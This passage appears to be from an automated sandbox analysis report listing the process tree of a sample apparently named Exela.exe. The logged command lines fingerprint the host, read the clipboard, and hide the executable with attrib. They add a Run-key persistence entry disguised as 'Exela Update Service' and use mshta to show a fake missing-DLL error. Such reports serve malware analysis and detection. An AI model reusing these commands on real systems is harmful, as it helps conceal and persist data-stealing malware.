                                                                                                                                                                                                                                                          Commandline:wmic computersystem get Manufacturer
                                                                                                                                                                                                                                                          Imagebase:0x7ff7f9cd0000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                          Start time:19:24:00
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                          Imagebase:0x7ff64f8b0000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                          Start time:19:24:01
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                          Start time:19:24:01
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                          Start time:19:24:01
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic path Win32_ComputerSystem get Manufacturer
                                                                                                                                                                                                                                                          Imagebase:0x7ff7f9cd0000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                          Start time:19:24:02
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                          Start time:19:24:02
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                          Start time:19:24:02
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                          Start time:19:24:02
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                          Start time:19:24:02
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                          Imagebase:0x7ff64f8b0000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                          Start time:19:24:02
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                          Imagebase:0x7ff7f9cd0000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                          Start time:19:24:03
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                          Start time:19:24:03
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                          Start time:19:24:03
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff719370000
                                                                                                                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                          Start time:19:24:03
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                                          Start time:19:24:03
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                          Start time:19:24:03
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f
                                                                                                                                                                                                                                                          Imagebase:0x7ff743a20000
                                                                                                                                                                                                                                                          File size:77'312 bytes
                                                                                                                                                                                                                                                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                                          Start time:19:24:04
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
                                                                                                                                                                                                                                                          Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                          Start time:19:24:04
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                          Start time:19:24:04
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                                          Start time:19:24:04
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                          Start time:19:24:04
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                                                                                                                                                                                                                                                          Imagebase:0x7ff631860000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                                          Start time:19:24:04
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                          Imagebase:0x7ff64f8b0000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff646c10000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                          Imagebase:0x7ff64f8b0000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe Get-Clipboard
                                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                                          Start time:19:24:05
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff646c10000
